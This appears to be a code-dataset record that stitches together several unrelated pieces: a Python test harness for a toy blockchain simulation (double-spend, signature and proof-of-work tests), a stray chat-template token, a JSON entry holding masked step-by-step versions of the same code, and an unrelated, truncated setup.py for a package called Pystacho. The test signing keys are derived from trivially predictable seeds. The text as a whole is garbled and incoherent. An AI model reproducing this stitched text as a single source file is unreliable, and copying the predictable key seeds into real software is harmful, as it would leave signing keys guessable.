for txObj in txListJsonObj['txList']:
newTx = Transaction(jsonObj=txObj)
txList.append(newTx)
return txList
def __initialSigningKeys(self) ->None:
"""
Generate and update signingKeys List for the network
"""
seedStr = '0' * 31
seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b',
'c', 'd', 'e', 'f']
seedList = []
for i in range(15):
seed = seedStr + seedNum[i]
seedList.append(seed.encode('utf-8'))
for seed in seedList:
self.signingKeysList.append(SigningKey(seed))
log.info('15 signing keys have been generated successfully')
def __initialPubKeys(self):
for signingKey in self.signingKeysList:
verifyKey = signingKey.verify_key
verifyKeyByte = verifyKey.encode(encoder=HexEncoder)
self.pubKeysList.append(verifyKey)
self.pubKeysByteList.append(verifyKeyByte)
log.info(str(len(self.pubKeysList)) +
' public keys have been generated successfully')
<|reserved_special_token_1|>
import time
import random
from BlockchainNetwork.MVB import *
from threading import Thread
coloredlogs.install()
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
log = logging.getLogger(__name__)
class MVBTest:
def __init__(self, initialNodeCnt):
self.mvb = MVB()
self.signingKeysList = []
self.pubKeysList = []
self.pubKeysByteList = []
self.__initialSigningKeys()
self.__initialPubKeys()
self.mvb.generateGenesisBlockFromJson()
self.mvb.initialNodes(initialNodeCnt)
for i, node in enumerate(self.mvb.networkNodes):
nodeThread = Thread(target=self.threadMining, args=(node, 1))
nodeThread.start()
def multipleValidTxTest(self):
"""
This method tests multiple valid transactions
"""
log.info("--------------------Multiple valid Tx tests now started-------------------")
self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/MultipleValidTestTx.json')
self.mvb.broadcastTxPools()
def doubleSpendTest(self):
"""
txOutputs is the genesis output.
txOutputs[0] was used twice in this test.
Both Tx1 and Tx2 make txOutputs[0] as input.
When Tx2 is mined, the verification will be failed.
"""
log.info("--------------------Double spend test now started-------------------")
log.info("A pair of valid and invalid transactions is added into GlobalTx Pool")
self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/DoubleSpendTestTx.json')
self.mvb.broadcastTxPools()
def inputOutputSumTest(self):
log.info("--------------------Input output sum test now started-------------------")
log.info("A pair of valid and invalid Transactions is added into GlobalTx Pool")
self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/InputOutputSumTestTx.json')
self.mvb.broadcastTxPools()
def sigVerifyTest(self):
log.info("--------------------Signature verify test now started-------------------")
log.info("A pair of valid and invalid Transactions is added into GlobalTx Pool")
self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/SigVerifyTestTx.json')
self.mvb.broadcastTxPools()
def numberHashTest(self):
log.info("--------------------Number hash test now started-------------------")
log.info("A pair of valid and invalid Transactions is added into GlobalTx Pool")
self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/NumberHashTestTx.json')
self.mvb.broadcastTxPools()
def txInputsExistTest(self):
log.info("--------------------Transaction inputs exist test now started-------------------")
log.info("A pair of valid and invalid Transactions is added into GlobalTx Pool")
self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/TxInputsExistTestTx.json')
self.mvb.broadcastTxPools()
def prevHashMatchTest(self):
log.info("--------------------Prev Hash test now started-------------------")
log.info("Node 2 broadcast a Block with invalid prev-hash to the other nodes")
txList = self.readTxFromFile('./TxFiles/PrevHashMatchTestTx.json')
self.mvb.networkNodes[1].mineInvalidBlock(txList[0], isInvalidPrevHash=True)
def blockPOWTest(self):
log.info("--------------------Block POW test now started-------------------")
log.info("Node 1 broadcast a Block with invalid POW to the other nodes")
txList = self.readTxFromFile('./TxFiles/BlockPOWTestTx.json')
self.mvb.networkNodes[0].mineInvalidBlock(txList[0], isInvalidPOW=True)
def threadMining(self, node: Node, i):
nowTime = time.time()
while True:
sleep(random.uniform(0.05, 0.1))
node.receiveBroadcastBlock()
for tx in node.globalTxPool:
node.mineBlock(tx)
if node.globalTxPool:
node.globalTxPool.remove(tx)
if time.time() - nowTime > 15:
break
node.saveToFile()
def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):
txListJsonObj = {'txList': []}
for tx in txList:
txListJsonObj['txList'].append(tx.getJsonObj())
with open(FILENAME, 'w', encoding='utf-8') as f:
f.write(json.dumps(txListJsonObj, indent=4))
def readTxFromFile(self, FILENAME: str) -> List[Transaction]:
txList = []
with open(FILENAME, 'r', encoding='utf-8') as f:
txListJsonObj = json.load(f)
for txObj in txListJsonObj['txList']:
newTx = Transaction(jsonObj=txObj)
txList.append(newTx)
return txList
def __initialSigningKeys(self) -> None:
"""
Generate and update signingKeys List for the network
"""
seedStr = '0' * 31
seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']
seedList = []
for i in range(15):
seed = seedStr + seedNum[i]
seedList.append(seed.encode('utf-8'))
for seed in seedList:
self.signingKeysList.append(SigningKey(seed))
log.info("15 signing keys have been generated successfully")
def __initialPubKeys(self):
for signingKey in self.signingKeysList:
verifyKey = signingKey.verify_key
verifyKeyByte = verifyKey.encode(encoder=HexEncoder)
self.pubKeysList.append(verifyKey)
self.pubKeysByteList.append(verifyKeyByte)
log.info(str(len(self.pubKeysList)) + " public keys have been generated successfully")
|
flexible
|
{
"blob_id": "8ad9efbbb2d9e2a5f73ebbb999da3ed93e4c1974",
"index": 9655,
"step-1": "<mask token>\n\n\nclass MVBTest:\n <mask token>\n <mask token>\n\n def doubleSpendTest(self):\n \"\"\"\n txOutputs is the genesis output.\n txOutputs[0] was used twice in this test.\n Both Tx1 and Tx2 make txOutputs[0] as input.\n When Tx2 is mined, the verification will be failed.\n \"\"\"\n log.info(\n '--------------------Double spend test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/DoubleSpendTestTx.json')\n self.mvb.broadcastTxPools()\n\n def inputOutputSumTest(self):\n log.info(\n '--------------------Input output sum test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/InputOutputSumTestTx.json')\n self.mvb.broadcastTxPools()\n\n def sigVerifyTest(self):\n log.info(\n '--------------------Signature verify test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/SigVerifyTestTx.json')\n self.mvb.broadcastTxPools()\n\n def numberHashTest(self):\n log.info(\n '--------------------Number hash test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/NumberHashTestTx.json')\n self.mvb.broadcastTxPools()\n\n def txInputsExistTest(self):\n log.info(\n '--------------------Transaction inputs exist test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/TxInputsExistTestTx.json')\n self.mvb.broadcastTxPools()\n <mask token>\n <mask token>\n\n def threadMining(self, node: Node, i):\n nowTime = time.time()\n while True:\n sleep(random.uniform(0.05, 0.1))\n node.receiveBroadcastBlock()\n for tx in node.globalTxPool:\n node.mineBlock(tx)\n if node.globalTxPool:\n node.globalTxPool.remove(tx)\n if time.time() - nowTime > 15:\n break\n node.saveToFile()\n\n def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):\n txListJsonObj = {'txList': []}\n for tx in txList:\n txListJsonObj['txList'].append(tx.getJsonObj())\n with open(FILENAME, 'w', encoding='utf-8') as f:\n f.write(json.dumps(txListJsonObj, indent=4))\n\n def readTxFromFile(self, FILENAME: str) ->List[Transaction]:\n txList = []\n with open(FILENAME, 'r', encoding='utf-8') as f:\n txListJsonObj = json.load(f)\n for txObj in txListJsonObj['txList']:\n newTx = Transaction(jsonObj=txObj)\n txList.append(newTx)\n return txList\n\n def __initialSigningKeys(self) ->None:\n \"\"\"\n Generate and update signingKeys List for the network\n \"\"\"\n seedStr = '0' * 31\n seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b',\n 'c', 'd', 'e', 'f']\n seedList = []\n for i in range(15):\n seed = seedStr + seedNum[i]\n seedList.append(seed.encode('utf-8'))\n for seed in seedList:\n self.signingKeysList.append(SigningKey(seed))\n log.info('15 signing keys have been generated successfully')\n\n def __initialPubKeys(self):\n for signingKey in self.signingKeysList:\n verifyKey = signingKey.verify_key\n verifyKeyByte = verifyKey.encode(encoder=HexEncoder)\n self.pubKeysList.append(verifyKey)\n self.pubKeysByteList.append(verifyKeyByte)\n log.info(str(len(self.pubKeysList)) +\n ' public keys have been generated successfully')\n",
"step-2": "<mask token>\n\n\nclass MVBTest:\n\n def __init__(self, initialNodeCnt):\n self.mvb = MVB()\n self.signingKeysList = []\n self.pubKeysList = []\n self.pubKeysByteList = []\n self.__initialSigningKeys()\n self.__initialPubKeys()\n self.mvb.generateGenesisBlockFromJson()\n self.mvb.initialNodes(initialNodeCnt)\n for i, node in enumerate(self.mvb.networkNodes):\n nodeThread = Thread(target=self.threadMining, args=(node, 1))\n nodeThread.start()\n\n def multipleValidTxTest(self):\n \"\"\"\n This method tests multiple valid transactions\n \"\"\"\n log.info(\n '--------------------Multiple valid Tx tests now started-------------------'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/MultipleValidTestTx.json')\n self.mvb.broadcastTxPools()\n\n def doubleSpendTest(self):\n \"\"\"\n txOutputs is the genesis output.\n txOutputs[0] was used twice in this test.\n Both Tx1 and Tx2 make txOutputs[0] as input.\n When Tx2 is mined, the verification will be failed.\n \"\"\"\n log.info(\n '--------------------Double spend test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/DoubleSpendTestTx.json')\n self.mvb.broadcastTxPools()\n\n def inputOutputSumTest(self):\n log.info(\n '--------------------Input output sum test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/InputOutputSumTestTx.json')\n self.mvb.broadcastTxPools()\n\n def sigVerifyTest(self):\n log.info(\n '--------------------Signature verify test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/SigVerifyTestTx.json')\n self.mvb.broadcastTxPools()\n\n def numberHashTest(self):\n log.info(\n '--------------------Number hash test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/NumberHashTestTx.json')\n self.mvb.broadcastTxPools()\n\n def txInputsExistTest(self):\n log.info(\n '--------------------Transaction inputs exist test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/TxInputsExistTestTx.json')\n self.mvb.broadcastTxPools()\n\n def prevHashMatchTest(self):\n log.info(\n '--------------------Prev Hash test now started-------------------'\n )\n log.info(\n 'Node 2 broadcast a Block with invalid prev-hash to the other nodes'\n )\n txList = self.readTxFromFile('./TxFiles/PrevHashMatchTestTx.json')\n self.mvb.networkNodes[1].mineInvalidBlock(txList[0],\n isInvalidPrevHash=True)\n\n def blockPOWTest(self):\n log.info(\n '--------------------Block POW test now started-------------------'\n )\n log.info('Node 1 broadcast a Block with invalid POW to the other nodes'\n )\n txList = self.readTxFromFile('./TxFiles/BlockPOWTestTx.json')\n self.mvb.networkNodes[0].mineInvalidBlock(txList[0], isInvalidPOW=True)\n\n def threadMining(self, node: Node, i):\n nowTime = time.time()\n while True:\n sleep(random.uniform(0.05, 0.1))\n node.receiveBroadcastBlock()\n for tx in node.globalTxPool:\n node.mineBlock(tx)\n if node.globalTxPool:\n node.globalTxPool.remove(tx)\n if time.time() - nowTime > 15:\n break\n node.saveToFile()\n\n def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):\n txListJsonObj = {'txList': []}\n for tx in txList:\n txListJsonObj['txList'].append(tx.getJsonObj())\n with open(FILENAME, 'w', encoding='utf-8') as f:\n f.write(json.dumps(txListJsonObj, indent=4))\n\n def readTxFromFile(self, FILENAME: str) ->List[Transaction]:\n txList = []\n with open(FILENAME, 'r', encoding='utf-8') as f:\n txListJsonObj = json.load(f)\n for txObj in txListJsonObj['txList']:\n newTx = Transaction(jsonObj=txObj)\n txList.append(newTx)\n return txList\n\n def __initialSigningKeys(self) ->None:\n \"\"\"\n Generate and update signingKeys List for the network\n \"\"\"\n seedStr = '0' * 31\n seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b',\n 'c', 'd', 'e', 'f']\n seedList = []\n for i in range(15):\n seed = seedStr + seedNum[i]\n seedList.append(seed.encode('utf-8'))\n for seed in seedList:\n self.signingKeysList.append(SigningKey(seed))\n log.info('15 signing keys have been generated successfully')\n\n def __initialPubKeys(self):\n for signingKey in self.signingKeysList:\n verifyKey = signingKey.verify_key\n verifyKeyByte = verifyKey.encode(encoder=HexEncoder)\n self.pubKeysList.append(verifyKey)\n self.pubKeysByteList.append(verifyKeyByte)\n log.info(str(len(self.pubKeysList)) +\n ' public keys have been generated successfully')\n",
"step-3": "<mask token>\ncoloredlogs.install()\nlogging.basicConfig(level=logging.INFO, format=\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlog = logging.getLogger(__name__)\n\n\nclass MVBTest:\n\n def __init__(self, initialNodeCnt):\n self.mvb = MVB()\n self.signingKeysList = []\n self.pubKeysList = []\n self.pubKeysByteList = []\n self.__initialSigningKeys()\n self.__initialPubKeys()\n self.mvb.generateGenesisBlockFromJson()\n self.mvb.initialNodes(initialNodeCnt)\n for i, node in enumerate(self.mvb.networkNodes):\n nodeThread = Thread(target=self.threadMining, args=(node, 1))\n nodeThread.start()\n\n def multipleValidTxTest(self):\n \"\"\"\n This method tests multiple valid transactions\n \"\"\"\n log.info(\n '--------------------Multiple valid Tx tests now started-------------------'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/MultipleValidTestTx.json')\n self.mvb.broadcastTxPools()\n\n def doubleSpendTest(self):\n \"\"\"\n txOutputs is the genesis output.\n txOutputs[0] was used twice in this test.\n Both Tx1 and Tx2 make txOutputs[0] as input.\n When Tx2 is mined, the verification will be failed.\n \"\"\"\n log.info(\n '--------------------Double spend test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/DoubleSpendTestTx.json')\n self.mvb.broadcastTxPools()\n\n def inputOutputSumTest(self):\n log.info(\n '--------------------Input output sum test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/InputOutputSumTestTx.json')\n self.mvb.broadcastTxPools()\n\n def sigVerifyTest(self):\n log.info(\n '--------------------Signature verify test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/SigVerifyTestTx.json')\n self.mvb.broadcastTxPools()\n\n def numberHashTest(self):\n log.info(\n '--------------------Number hash test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/NumberHashTestTx.json')\n self.mvb.broadcastTxPools()\n\n def txInputsExistTest(self):\n log.info(\n '--------------------Transaction inputs exist test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/TxInputsExistTestTx.json')\n self.mvb.broadcastTxPools()\n\n def prevHashMatchTest(self):\n log.info(\n '--------------------Prev Hash test now started-------------------'\n )\n log.info(\n 'Node 2 broadcast a Block with invalid prev-hash to the other nodes'\n )\n txList = self.readTxFromFile('./TxFiles/PrevHashMatchTestTx.json')\n self.mvb.networkNodes[1].mineInvalidBlock(txList[0],\n isInvalidPrevHash=True)\n\n def blockPOWTest(self):\n log.info(\n '--------------------Block POW test now started-------------------'\n )\n log.info('Node 1 broadcast a Block with invalid POW to the other nodes'\n )\n txList = self.readTxFromFile('./TxFiles/BlockPOWTestTx.json')\n self.mvb.networkNodes[0].mineInvalidBlock(txList[0], isInvalidPOW=True)\n\n def threadMining(self, node: Node, i):\n nowTime = time.time()\n while True:\n sleep(random.uniform(0.05, 0.1))\n node.receiveBroadcastBlock()\n for tx in node.globalTxPool:\n node.mineBlock(tx)\n if node.globalTxPool:\n node.globalTxPool.remove(tx)\n if time.time() - nowTime > 15:\n break\n node.saveToFile()\n\n def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):\n txListJsonObj = {'txList': []}\n for tx in txList:\n txListJsonObj['txList'].append(tx.getJsonObj())\n with open(FILENAME, 'w', encoding='utf-8') as f:\n f.write(json.dumps(txListJsonObj, indent=4))\n\n def readTxFromFile(self, FILENAME: str) ->List[Transaction]:\n txList = []\n with open(FILENAME, 'r', encoding='utf-8') as f:\n txListJsonObj = json.load(f)\n for txObj in txListJsonObj['txList']:\n newTx = Transaction(jsonObj=txObj)\n txList.append(newTx)\n return txList\n\n def __initialSigningKeys(self) ->None:\n \"\"\"\n Generate and update signingKeys List for the network\n \"\"\"\n seedStr = '0' * 31\n seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b',\n 'c', 'd', 'e', 'f']\n seedList = []\n for i in range(15):\n seed = seedStr + seedNum[i]\n seedList.append(seed.encode('utf-8'))\n for seed in seedList:\n self.signingKeysList.append(SigningKey(seed))\n log.info('15 signing keys have been generated successfully')\n\n def __initialPubKeys(self):\n for signingKey in self.signingKeysList:\n verifyKey = signingKey.verify_key\n verifyKeyByte = verifyKey.encode(encoder=HexEncoder)\n self.pubKeysList.append(verifyKey)\n self.pubKeysByteList.append(verifyKeyByte)\n log.info(str(len(self.pubKeysList)) +\n ' public keys have been generated successfully')\n",
"step-4": "import time\nimport random\nfrom BlockchainNetwork.MVB import *\nfrom threading import Thread\ncoloredlogs.install()\nlogging.basicConfig(level=logging.INFO, format=\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlog = logging.getLogger(__name__)\n\n\nclass MVBTest:\n\n def __init__(self, initialNodeCnt):\n self.mvb = MVB()\n self.signingKeysList = []\n self.pubKeysList = []\n self.pubKeysByteList = []\n self.__initialSigningKeys()\n self.__initialPubKeys()\n self.mvb.generateGenesisBlockFromJson()\n self.mvb.initialNodes(initialNodeCnt)\n for i, node in enumerate(self.mvb.networkNodes):\n nodeThread = Thread(target=self.threadMining, args=(node, 1))\n nodeThread.start()\n\n def multipleValidTxTest(self):\n \"\"\"\n This method tests multiple valid transactions\n \"\"\"\n log.info(\n '--------------------Multiple valid Tx tests now started-------------------'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/MultipleValidTestTx.json')\n self.mvb.broadcastTxPools()\n\n def doubleSpendTest(self):\n \"\"\"\n txOutputs is the genesis output.\n txOutputs[0] was used twice in this test.\n Both Tx1 and Tx2 make txOutputs[0] as input.\n When Tx2 is mined, the verification will be failed.\n \"\"\"\n log.info(\n '--------------------Double spend test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/DoubleSpendTestTx.json')\n self.mvb.broadcastTxPools()\n\n def inputOutputSumTest(self):\n log.info(\n '--------------------Input output sum test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/InputOutputSumTestTx.json')\n self.mvb.broadcastTxPools()\n\n def sigVerifyTest(self):\n log.info(\n '--------------------Signature verify test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/SigVerifyTestTx.json')\n self.mvb.broadcastTxPools()\n\n def numberHashTest(self):\n log.info(\n '--------------------Number hash test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/NumberHashTestTx.json')\n self.mvb.broadcastTxPools()\n\n def txInputsExistTest(self):\n log.info(\n '--------------------Transaction inputs exist test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/TxInputsExistTestTx.json')\n self.mvb.broadcastTxPools()\n\n def prevHashMatchTest(self):\n log.info(\n '--------------------Prev Hash test now started-------------------'\n )\n log.info(\n 'Node 2 broadcast a Block with invalid prev-hash to the other nodes'\n )\n txList = self.readTxFromFile('./TxFiles/PrevHashMatchTestTx.json')\n self.mvb.networkNodes[1].mineInvalidBlock(txList[0],\n isInvalidPrevHash=True)\n\n def blockPOWTest(self):\n log.info(\n '--------------------Block POW test now started-------------------'\n )\n log.info('Node 1 broadcast a Block with invalid POW to the other nodes'\n )\n txList = self.readTxFromFile('./TxFiles/BlockPOWTestTx.json')\n self.mvb.networkNodes[0].mineInvalidBlock(txList[0], isInvalidPOW=True)\n\n def threadMining(self, node: Node, i):\n nowTime = time.time()\n while True:\n sleep(random.uniform(0.05, 0.1))\n node.receiveBroadcastBlock()\n for tx in node.globalTxPool:\n node.mineBlock(tx)\n if node.globalTxPool:\n node.globalTxPool.remove(tx)\n if time.time() - nowTime > 15:\n break\n node.saveToFile()\n\n def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):\n txListJsonObj = {'txList': []}\n for tx in txList:\n txListJsonObj['txList'].append(tx.getJsonObj())\n with open(FILENAME, 'w', encoding='utf-8') as f:\n f.write(json.dumps(txListJsonObj, indent=4))\n\n def readTxFromFile(self, FILENAME: str) ->List[Transaction]:\n txList = []\n with open(FILENAME, 'r', encoding='utf-8') as f:\n txListJsonObj = json.load(f)\n for txObj in txListJsonObj['txList']:\n newTx = Transaction(jsonObj=txObj)\n txList.append(newTx)\n return txList\n\n def __initialSigningKeys(self) ->None:\n \"\"\"\n Generate and update signingKeys List for the network\n \"\"\"\n seedStr = '0' * 31\n seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b',\n 'c', 'd', 'e', 'f']\n seedList = []\n for i in range(15):\n seed = seedStr + seedNum[i]\n seedList.append(seed.encode('utf-8'))\n for seed in seedList:\n self.signingKeysList.append(SigningKey(seed))\n log.info('15 signing keys have been generated successfully')\n\n def __initialPubKeys(self):\n for signingKey in self.signingKeysList:\n verifyKey = signingKey.verify_key\n verifyKeyByte = verifyKey.encode(encoder=HexEncoder)\n self.pubKeysList.append(verifyKey)\n self.pubKeysByteList.append(verifyKeyByte)\n log.info(str(len(self.pubKeysList)) +\n ' public keys have been generated successfully')\n",
"step-5": "import time\nimport random\n\nfrom BlockchainNetwork.MVB import *\nfrom threading import Thread\n\ncoloredlogs.install()\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlog = logging.getLogger(__name__)\n\n\nclass MVBTest:\n def __init__(self, initialNodeCnt):\n self.mvb = MVB()\n self.signingKeysList = []\n self.pubKeysList = []\n self.pubKeysByteList = []\n self.__initialSigningKeys()\n self.__initialPubKeys()\n\n self.mvb.generateGenesisBlockFromJson()\n self.mvb.initialNodes(initialNodeCnt)\n\n for i, node in enumerate(self.mvb.networkNodes):\n nodeThread = Thread(target=self.threadMining, args=(node, 1))\n nodeThread.start()\n\n def multipleValidTxTest(self):\n \"\"\"\n This method tests multiple valid transactions\n \"\"\"\n log.info(\"--------------------Multiple valid Tx tests now started-------------------\")\n\n self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/MultipleValidTestTx.json')\n self.mvb.broadcastTxPools()\n\n def doubleSpendTest(self):\n \"\"\"\n txOutputs is the genesis output.\n txOutputs[0] was used twice in this test.\n Both Tx1 and Tx2 make txOutputs[0] as input.\n When Tx2 is mined, the verification will be failed.\n \"\"\"\n log.info(\"--------------------Double spend test now started-------------------\")\n log.info(\"A pair of valid and invalid transactions is added into GlobalTx Pool\")\n\n self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/DoubleSpendTestTx.json')\n self.mvb.broadcastTxPools()\n\n def inputOutputSumTest(self):\n log.info(\"--------------------Input output sum test now started-------------------\")\n log.info(\"A pair of valid and invalid Transactions is added into GlobalTx Pool\")\n\n self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/InputOutputSumTestTx.json')\n self.mvb.broadcastTxPools()\n\n def sigVerifyTest(self):\n log.info(\"--------------------Signature verify test now started-------------------\")\n log.info(\"A pair of valid and invalid Transactions is added into GlobalTx Pool\")\n\n self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/SigVerifyTestTx.json')\n self.mvb.broadcastTxPools()\n\n def numberHashTest(self):\n log.info(\"--------------------Number hash test now started-------------------\")\n log.info(\"A pair of valid and invalid Transactions is added into GlobalTx Pool\")\n\n self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/NumberHashTestTx.json')\n self.mvb.broadcastTxPools()\n\n def txInputsExistTest(self):\n log.info(\"--------------------Transaction inputs exist test now started-------------------\")\n log.info(\"A pair of valid and invalid Transactions is added into GlobalTx Pool\")\n\n self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/TxInputsExistTestTx.json')\n self.mvb.broadcastTxPools()\n\n def prevHashMatchTest(self):\n log.info(\"--------------------Prev Hash test now started-------------------\")\n log.info(\"Node 2 broadcast a Block with invalid prev-hash to the other nodes\")\n\n txList = self.readTxFromFile('./TxFiles/PrevHashMatchTestTx.json')\n self.mvb.networkNodes[1].mineInvalidBlock(txList[0], isInvalidPrevHash=True)\n\n def blockPOWTest(self):\n log.info(\"--------------------Block POW test now started-------------------\")\n log.info(\"Node 1 broadcast a Block with invalid POW to the other nodes\")\n\n txList = self.readTxFromFile('./TxFiles/BlockPOWTestTx.json')\n self.mvb.networkNodes[0].mineInvalidBlock(txList[0], isInvalidPOW=True)\n\n def threadMining(self, node: Node, i):\n nowTime = time.time()\n while True:\n sleep(random.uniform(0.05, 0.1))\n node.receiveBroadcastBlock()\n for tx in node.globalTxPool:\n node.mineBlock(tx)\n if node.globalTxPool:\n node.globalTxPool.remove(tx)\n if time.time() - nowTime > 15:\n break\n\n node.saveToFile()\n\n def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):\n txListJsonObj = {'txList': []}\n for tx in txList:\n txListJsonObj['txList'].append(tx.getJsonObj())\n with open(FILENAME, 'w', encoding='utf-8') as f:\n f.write(json.dumps(txListJsonObj, indent=4))\n\n def readTxFromFile(self, FILENAME: str) -> List[Transaction]:\n txList = []\n with open(FILENAME, 'r', encoding='utf-8') as f:\n txListJsonObj = json.load(f)\n for txObj in txListJsonObj['txList']:\n newTx = Transaction(jsonObj=txObj)\n txList.append(newTx)\n return txList\n\n def __initialSigningKeys(self) -> None:\n \"\"\"\n Generate and update signingKeys List for the network\n \"\"\"\n seedStr = '0' * 31\n seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']\n seedList = []\n for i in range(15):\n seed = seedStr + seedNum[i]\n seedList.append(seed.encode('utf-8'))\n\n for seed in seedList:\n self.signingKeysList.append(SigningKey(seed))\n log.info(\"15 signing keys have been generated successfully\")\n\n def __initialPubKeys(self):\n for signingKey in self.signingKeysList:\n verifyKey = signingKey.verify_key\n verifyKeyByte = verifyKey.encode(encoder=HexEncoder)\n self.pubKeysList.append(verifyKey)\n self.pubKeysByteList.append(verifyKeyByte)\n log.info(str(len(self.pubKeysList)) + \" public keys have been generated successfully\")\n",
"step-ids": [
11,
15,
17,
18,
19
]
}
|
[
11,
15,
17,
18,
19
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the
# Pystacho Project (https://github.com/aruderman/pystacho/).
# Copyright (c) 2021, Francisco Fernandez, Benjamin Marcologno, Andrés Ruderman
# License: MIT
# Full Text: https://github.com/aruderman/pystacho/blob/master/LICENSE
# =====================================================================
# DOCS
# =====================================================================
"""This file is for distribute and install Pystacho"""
# ======================================================================
# IMPORTS
# ======================================================================
import os
import pathlib
from setuptools import setup
# =============================================================================
# CONSTANTS
# =============================================================================
PATH = pathlib.Path(os.path.abspath(os.path.dirname(__file__)))
REQUIREMENTS = [
"diskcache",
"numpy",
"pandas",
"matplotlib",
"pymatgen",
"seaborn",
"lightgbm",
"matminer",
"scikit-learn",
]
with open(PATH / "pystacho" / "__init__.py") as fp:
for line in fp.readlines():
if line.startswith("__version__ = "):
VERSION = line.split("=", 1)[-1].replace('"', "").strip()
break
with open("README.md") as fp:
LONG_DESCRIPTION = fp.read()
# =============================================================================
# FUNCTIONS
# =============================================================================
setup(
name="Pystacho",
version=VERSION,
description="ESCRIBIR DESCRIPCION DEL PROYECTO",
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
author=["Francisco Fernandez", "Benjamin Marcologno", "Andrés Ruderman"],
author_email="[email protected]",
url="https://github.com/aruderman/pystacho",
packages=["pystacho"],
license="The MIT License",
install_requires=REQUIREMENTS,
keywords=["pystacho"],
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Education",
